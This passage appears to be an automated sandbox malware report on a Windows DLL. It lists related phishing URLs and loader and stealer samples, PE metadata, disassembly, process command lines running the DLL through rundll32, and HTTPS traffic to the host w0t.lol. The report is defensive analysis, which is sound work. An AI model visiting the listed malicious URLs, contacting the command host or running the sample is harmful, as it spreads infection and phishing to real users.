                  https://pt9w4x.nauleacepr.com/9QLzRhIr/#Ygovernment.relations@rolls-royce.comGet hashmaliciousHTMLPhisherBrowse
                  • 104.18.86.42
                  https://vwkugoia0yciq0buttompanj2.ntvultra.com/viciorhthvgh/forhwural/coupletri/QdhahVchT/yEjbKM/anNhbGFzQGhvbGxhbmRjby5jb20=Get hashmaliciousHTMLPhisherBrowse
                  • 104.17.25.14
                  Sales_Contract_Main_417053608_09.2024.pdfGet hashmaliciousUnknownBrowse
                  • 104.18.95.41
                  hbwebdownload - MT 103.exeGet hashmaliciousFormBookBrowse
                  • 188.114.96.3
                  hesaphareketi-01.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 188.114.97.3
                  https://links.rasa.io/v1/t/eJx1kM2OgjAUhV_FsB6kpUXQ1bzAuJp9c2mvTI1Q0tvGEMO7DzCKC51t73d-em5J9JfksEl-QujpkGXR19A13sUet9q1W4iZJko-NkmLAQwEmOhbQi56jbPwiFe6YAjoXyBswS7mBiwN2nVXGCSTn838PrvPCg8EqkUiaFCFoV9Na2_x9I0Uvv6OK0yxPqMO6tlhsmpjZ8OgppCTbaKHYF33IFflk7Nm1u3LUgDjp5QXRqZ1qU0KOYNUij0T1U7ntaxeOhJ2Rk1_XJJzlsuUs5TxlfOonTf3BF5UohBl9aZCj56mjv9wjzQfV0TIXck5E_I9RBTxjh5dt8wFtQrTgMr18xzrZRzHX-Cephc=#a2FyZW4ubW9vbmV5QGJhbGxhcmRkZXNpZ25zLm5ldA==Get hashmaliciousHTMLPhisherBrowse
                  • 104.17.25.14
                  Message_2477367.emlGet hashmaliciousUnknownBrowse
                  • 1.1.1.1
                  file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 104.26.13.205
                  Swift_ach Complaints.sppgCQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 104.18.11.207

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                  • 104.21.69.9
                  Passport.vbsGet hashmaliciousUnknownBrowse
                  • 104.21.69.9
                  Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                  • 104.21.69.9
                  18000012550_20240930_0078864246#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 104.21.69.9
                  PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbeGet hashmaliciousGuLoader, LokibotBrowse
                  • 104.21.69.9
                  A 413736796#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 104.21.69.9
                  Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                  • 104.21.69.9
                  SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                  • 104.21.69.9
                  Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                  • 104.21.69.9
                  6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                  • 104.21.69.9

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.857208389757357
                  TrID:
                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                  • Generic Win/DOS Executable (2004/3) 0.20%
                  • DOS Executable Generic (2002/1) 0.20%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:e.dll
                  File size:2'228'224 bytes
                  MD5:972d3e17b96745be89b80ec5d8f4f9d3
                  SHA1:e97c6461bbdcd91566f4cb75b456e399b7fe06c2
                  SHA256:b116511e3960ab5fa53ad6a3243240be11235ebdc323705827713cf12a9aeeda
                  SHA512:060b6a99fae4af1d869cd23b84ab2b18d69eeba5ff60ac1355e605e5ecfe049b41fb52dc5989cdac90572133389673cc48fe366494bcb01de278bf93a247982a
                  SSDEEP:49152:kwNgYx8UccgdkvUADkwkxSnTyCbJux8OwyvW:kwBVcNgUyZbnTytPTW
                  TLSH:90A502BDB064C781D64B397F7E0A332DB53A17805187AD26E51778AE70236EC11B42BB
                  File Content Preview:MZ......................@............................................q...q...q..0/...q..u*...q...,...q.......q..u*...q....V..q.......q..M....q..Rich.q..............PE..L...q3.f...........!......... !.....P.............@..........................."........

                  File Icon

                  Icon Hash:0f372331d982ca5a

                  Static PE Info

                  General

                  Entrypoint:0x401450
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x66F43371 [Wed Sep 25 15:59:45 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:0
                  File Version Major:5
                  File Version Minor:0
                  Subsystem Version Major:5
                  Subsystem Version Minor:0
                  Import Hash:abe607481ac2953967a12ac99e7e578f

                  Entrypoint Preview

                  Instruction
                  inc edx
                  inc edx
                  inc eax
                  add dword ptr [00433320h], esp
                  inc eax
                  dec eax
                  inc edx
                  dec eax
                  jmp 00007F5C4490523Fh
                  dec eax
                  mov eax, esi
                  push eax
                  pop dword ptr [00433310h]
                  xor edx, 0Ah
                  inc edx
                  mov eax, edx
                  xor dword ptr [00433318h], ebx
                  mov eax, edi
                  push eax
                  pop dword ptr [00433314h]
                  mov dword ptr [0043331Ch], ebp
                  lea eax, dword ptr [00401210h]
                  call eax
                  jmp 00007F5C449051E3h
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  xor edx, 5Fh
                  mov dword ptr [ebp+00h], eax
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  nop
                  push ebp
                  mov ebp, esp
                  push eax
                  mov eax, 00000001h
                  mov dword ptr [ebp-04h], 00000000h
                  add esp, 04h
                  pop ebp
                  ret
                  nop
                  nop

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xf6940x50.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x20f0000x6d28.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2160000x9a4c.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0xf0300x1c.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0xf0000x30.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000xc9100xd000d8c6c2ce2710e51965ec969f1e605308False0.09927133413461539data1.5511921998856308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .crt10xe0000x4e0x1000029ebcb0413d7a466159aef461509fffFalse0.025634765625data0.19194904064040105IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0xf0000x8370x10003936868e1249266d25c6c43831ecaa9cFalse0.298583984375data2.7036873961689896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x100000x242000x24000728fa214bf78861ed2be0464e5b2e851False0.2669542100694444data6.204494425770218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  z4g0x350000x7a4cf0x7b000398319310efec22a8e1707da92eb10beFalse0.9946666190294715data7.995421677975023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  qm0xb00000x70e8f0x71000fa2c61d59fecbab30f271e9278c4e647False0.9991314643252213data7.99943170498821IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  L0x1210000xe75040xe8000d17b37313f02147b68341a0bca06f4bfFalse0.9966262291217672data7.997710795649098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  CONST0x2090000xd880x1000b052a42265a0ef04c82877e017c33121False0.7548828125data7.057514057791508IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  30x20a0000x13a00x20006c371933aac1ef87a68049c0aca61de8False0.5489501953125data5.6043812950914065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  buicKDZl0x20c0000xf0e0x1000ecb3c30a4d5685f7394de862efbb63cdFalse0.756591796875data6.855147821668895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  CRT0x20d0000x19200x2000f44e399cc7eb92f94e27ac6c5b5c2312False0.7213134765625data6.598433129737103IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x20f0000x6d280x700085992fe593ac7adce6fc2d273bfa339cFalse0.30946568080357145data5.688832279317778IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x2160000xada80xb00096222f6edd2ec89fd0af45e507598034False0.1380282315340909data5.6863785572940495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0x20f3100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.5469043151969981
                  RT_ICON0x2103b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.600177304964539
                  RT_ICON0x2108200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.5107879924953096
                  RT_ICON0x2118c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.648936170212766
                  RT_ICON0x211d300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.5668386491557224
                  RT_ICON0x212dd80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.6551418439716312
                  RT_ICON0x2132400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.5905253283302064
                  RT_ICON0x2142e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.6826241134751773
                  RT_ICON0x2147500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.5466697936210131
                  RT_ICON0x2157f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.6445035460992907
                  RT_GROUP_ICON0x215c600x22dataRussianRussia1.0588235294117647
                  RT_GROUP_ICON0x215c880x22dataRussianRussia1.0588235294117647
                  RT_GROUP_ICON0x215cb00x22dataRussianRussia1.0588235294117647
                  RT_GROUP_ICON0x215cd80x22dataRussianRussia1.0588235294117647
                  RT_GROUP_ICON0x215d000x22dataRussianRussia1.0588235294117647

                  Imports

                  DLLImport
                  OLEAUT32.dllVarBoolFromR4
                  KERNEL32.dllGetSystemTimeAsFileTime, GetStdHandle, SuspendThread, LoadLibraryExW, OutputDebugStringA, GetModuleFileNameW, GetBinaryTypeW
                  GDI32.dllBitBlt

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  RussianRussia

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 1, 2024 15:13:41.206187963 CEST49768443192.168.11.20104.21.69.9
                  Oct 1, 2024 15:13:41.206321955 CEST44349768104.21.69.9192.168.11.20
                  Oct 1, 2024 15:13:41.206552029 CEST49768443192.168.11.20104.21.69.9
                  Oct 1, 2024 15:13:41.233659029 CEST49768443192.168.11.20104.21.69.9
                  Oct 1, 2024 15:13:41.233724117 CEST44349768104.21.69.9192.168.11.20
                  Oct 1, 2024 15:13:41.538127899 CEST44349768104.21.69.9192.168.11.20
                  Oct 1, 2024 15:13:41.538325071 CEST49768443192.168.11.20104.21.69.9
                  Oct 1, 2024 15:13:41.538325071 CEST49768443192.168.11.20104.21.69.9
                  Oct 1, 2024 15:13:41.569322109 CEST49768443192.168.11.20104.21.69.9
                  Oct 1, 2024 15:13:41.569375992 CEST44349768104.21.69.9192.168.11.20
                  Oct 1, 2024 15:13:41.569978952 CEST44349768104.21.69.9192.168.11.20
                  Oct 1, 2024 15:13:41.570198059 CEST49768443192.168.11.20104.21.69.9
                  Oct 1, 2024 15:13:41.572062016 CEST49768443192.168.11.20104.21.69.9
                  Oct 1, 2024 15:13:41.616287947 CEST44349768104.21.69.9192.168.11.20
                  Oct 1, 2024 15:14:22.473273993 CEST44349768104.21.69.9192.168.11.20
                  Oct 1, 2024 15:14:22.473858118 CEST44349768104.21.69.9192.168.11.20
                  Oct 1, 2024 15:14:22.473865986 CEST49768443192.168.11.20104.21.69.9
                  Oct 1, 2024 15:14:22.474410057 CEST49768443192.168.11.20104.21.69.9
                  Oct 1, 2024 15:14:22.475591898 CEST49768443192.168.11.20104.21.69.9
                  Oct 1, 2024 15:14:22.475593090 CEST49768443192.168.11.20104.21.69.9
                  Oct 1, 2024 15:14:22.475667000 CEST44349768104.21.69.9192.168.11.20
                  Oct 1, 2024 15:14:22.475821018 CEST49768443192.168.11.20104.21.69.9

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 1, 2024 15:13:41.063515902 CEST5305153192.168.11.201.1.1.1
                  Oct 1, 2024 15:13:41.200373888 CEST53530511.1.1.1192.168.11.20

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 1, 2024 15:13:41.063515902 CEST192.168.11.201.1.1.10x9f81Standard query (0)w0t.lolA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 1, 2024 15:13:41.200373888 CEST1.1.1.1192.168.11.200x9f81No error (0)w0t.lol104.21.69.9A (IP address)IN (0x0001)false
                  Oct 1, 2024 15:13:41.200373888 CEST1.1.1.1192.168.11.200x9f81No error (0)w0t.lol172.67.202.143A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • w0t.lol

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.11.2049768104.21.69.9443856C:\Windows\SysWOW64\rundll32.exe
                  TimestampBytes transferredDirectionData
                  2024-10-01 13:13:41 UTC714OUTGET /S2wueuBWcKItxJBxaKQWGAqL7hMS3sfSm3IIJcJI-UnDuhqZF3FZYmhcdfYjgTH9ls8toERqLL6uvqWxks5TXG7p4KTZE3NtE0QUExXonRRsVxuWAUUUBfY4OBn0j6WOD9WysDP09mb9Mw2zw25E4216qfUiBb1_-f0hXmBwm-5V3zs05mClVySIs4Q2owQXkeB3urgLrouGFuJF9ZudjP54bzXceldzNx2o8pCLFM6WK1vNqyQJ4ZGEs5wabg119exWDBy_U0fDfIKkmquk4nx095rTVG61p-61BBPfkxzOTkQYmZHX6uOiApQ41hZ0OE5yH5VhrRws_4Dk7blD-zRqQGci0UruB3OYd7fIEanuxbGDB6PoPMh8nJxhyUjELjSu3EwICQdnYkBbiVs2LkVCWKmmn2lIaQTzB-OoNpw-dg1CW7D5qiS6SoaepRg HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Host: w0t.lol
                  Connection: Keep-Alive
                  2024-10-01 13:14:22 UTC306INHTTP/1.1 404 Not Found
                  Date: Tue, 01 Oct 2024 13:14:22 GMT
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Cache-Control: no-cache, no-store, must-revalidate
                  CF-Cache-Status: DYNAMIC
                  Speculation-Rules: "/cdn-cgi/speculation"
                  Server: cloudflare
                  CF-RAY: 8cbcb62419383343-MIA
                  2024-10-01 13:14:22 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                  Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                  2024-10-01 13:14:22 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:09:12:45
                  Start date:01/10/2024
                  Path:C:\Windows\System32\loaddll32.exe
                  Wow64 process (32bit):true
                  Commandline:loaddll32.exe "C:\Users\user\Desktop\e.dll"
                  Imagebase:0xd10000
                  File size:126'464 bytes
                  MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:1
                  Start time:09:12:45
                  Start date:01/10/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7e9d70000
                  File size:875'008 bytes
                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:2
                  Start time:09:12:45
                  Start date:01/10/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\e.dll",#1
                  Imagebase:0xef0000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:09:12:45
                  Start date:01/10/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\e.dll",#1
                  Imagebase:0x7f0000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:20%
                    Total number of Nodes:15
                    Total number of Limit Nodes:1
                    execution_graph 607 401450 608 40145f 607->608 610 401210 608->610 611 40121b 610->611 612 401224 611->612 616 40bac0 611->616 612->608 617 40bafc GetBinaryTypeW 616->617 618 401298 617->618 618->612 619 40c8c0 618->619 620 40c8dc 619->620 622 40c906 620->622 623 40c340 620->623 622->612 627 40bb70 623->627 626 40c38c 628 40bb84 GetPEB 627->628 628->626

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph 0 Function_00401340 1 Function_0040C340 34 Function_0040BB70 1->34 2 Function_0060AA62 3 Function_0060A564 4 Function_0060AC66 5 Function_0040D448 109 Function_0040BE90 5->109 6 Function_0060B069 7 Function_0060966A 8 Function_0060996B 9 Function_00609D6E 10 Function_0040C150 11 Function_0040CA50 12 Function_0040CF50 13 Function_0040C550 35 Function_0040C270 13->35 14 Function_00401450 54 Function_00401210 14->54 15 Function_0060AE71 16 Function_00609272 17 Function_0060A57A 18 Function_0040C65B 19 Function_0060B27B 20 Function_0060C17B 21 Function_0060987D 22 Function_0060957F 23 Function_0040BA60 24 Function_0040CA60 24->34 62 Function_0040CC20 24->62 105 Function_0040C590 24->105 106 Function_0040C890 24->106 115 Function_0040CEA0 24->115 25 Function_0040D160 26 Function_0040CE60 27 Function_0060AB41 28 Function_00609A45 29 Function_0060A447 30 Function_0060A949 31 Function_0060984B 32 Function_0060A34B 33 Function_0040B970 107 Function_0040C190 35->107 36 Function_0040D370 36->11 36->34 47 Function_0040D700 36->47 36->115 37 Function_00609351 38 Function_00609552 39 Function_0060A257 40 Function_00609A59 41 Function_0060925A 42 Function_0060975A 43 Function_0060AE5A 44 Function_00609D5F 45 Function_00401000 46 Function_0040BC00 46->13 47->24 114 Function_0040C2A0 47->114 48 Function_00609722 49 Function_00609523 50 Function_0060A526 51 Function_00609227 52 Function_0060B128 53 Function_0060962A 54->23 54->33 63 Function_0040B920 54->63 77 Function_0040BAC0 54->77 78 Function_0040C8C0 54->78 79 Function_004012C0 54->79 84 Function_0040B9D0 54->84 55 Function_0040C610 56 Function_0060A730 57 Function_0060AE3D 58 Function_0060A83F 59 Function_0060AA3F 60 Function_00570E37 61 Function_0040BF20 61->10 70 Function_0040C530 61->70 71 Function_0040C030 61->71 69 Function_0040BE30 62->69 85 Function_0040C7D0 62->85 62->106 64 Function_00609602 65 Function_0060B204 66 Function_0060AA05 67 Function_0040BC2A 68 Function_0040D730 68->46 101 Function_0040D680 68->101 71->25 71->34 72 Function_0060AA10 73 Function_00609415 74 Function_00609A15 75 Function_00609917 76 Function_0060A61E 78->1 78->36 78->68 78->69 90 Function_004010E0 78->90 91 Function_0040CFE0 78->91 80 Function_006095E1 81 Function_0060A9E5 82 Function_0060A6E6 83 Function_0060B0EF 84->34 85->68 85->115 86 Function_006098F4 87 Function_0060D1F4 88 Function_006095F9 89 Function_0060A5FA 108 Function_00401090 90->108 91->26 91->47 91->61 91->115 92 Function_0040D1E0 93 Function_0060AFC2 94 Function_0060B0C3 95 Function_00609AD1 96 Function_0060A9D1 97 Function_0060A2D2 98 Function_0060AED3 99 Function_0060AAD8 100 Function_006099DB 102 Function_0040148E 103 Function_006092AE 104 Function_0060A2AE 105->34 109->55 109->92 110 Function_0040C391 111 Function_0060A9BE 112 Function_0060ADBE 113 Function_0040BBA0 114->68 114->115 115->12 116 Function_005211B3 117 Function_0060B189 118 Function_0040D4AA 118->25 119 Function_0060AE8A 120 Function_0060A28F 121 Function_0060A592 122 Function_0060AB96

                    Executed Functions

                    Function 0040BAC0 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 40bac0-40bb28 GetBinaryTypeW 2 40bb41-40bb48 0->2 3 40bb2a-40bb59 0->3 5 40bb2c-40bb37 2->5 6 40bb38-40bb3f 3->6 7 40bb5b-40bb62 3->7 6->5 7->5
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.89094717953.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.89094687410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094717953.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094776577.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094805713.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094855256.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094883864.0000000000435000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89095257309.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                    Similarity
                    • API ID: BinaryType
                    • String ID:
                    • API String ID: 3726996659-0
                    • Opcode ID: f08c01220cdb92308e6675d8711dd31eef13735afd4c0da1eb9ca56311e6b591
                    • Instruction ID: f04447051f637acae275e0fc76e63c99c49ac1912a4e59a5da11b41603d828b7
                    • Opcode Fuzzy Hash: f08c01220cdb92308e6675d8711dd31eef13735afd4c0da1eb9ca56311e6b591
                    • Instruction Fuzzy Hash: E81121B094021C8BDB20DF64E9483ECBBB0FB10304F1041AAD409A76C4D3755AC9CFDA

                    Non-executed Functions

                    Function 0040C340 Relevance: .1, Instructions: 121COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.89094717953.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.89094687410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094717953.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094776577.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094805713.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094855256.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094883864.0000000000435000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89095257309.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2dbdcf60662948e2ff885b22cd55f1fd29c6a08333cf398e80a49c496a15d30f
                    • Instruction ID: 934b070544ea70db5ffccdbbb63979c1f88a9cc566a2ff2b6c6b34971c7bcd6a
                    • Opcode Fuzzy Hash: 2dbdcf60662948e2ff885b22cd55f1fd29c6a08333cf398e80a49c496a15d30f
                    • Instruction Fuzzy Hash: 5551D874A04215DFDB04CF98C4D4ABDB7B1FB88304F60856AD812EB3E0D739A991DB5A
                    Function 00401090 Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.89094717953.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.89094687410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094717953.000000000040B000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094776577.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.89094805713.0000000000410000.00000008.00000001.01000000.00000003.sdmpDownload File
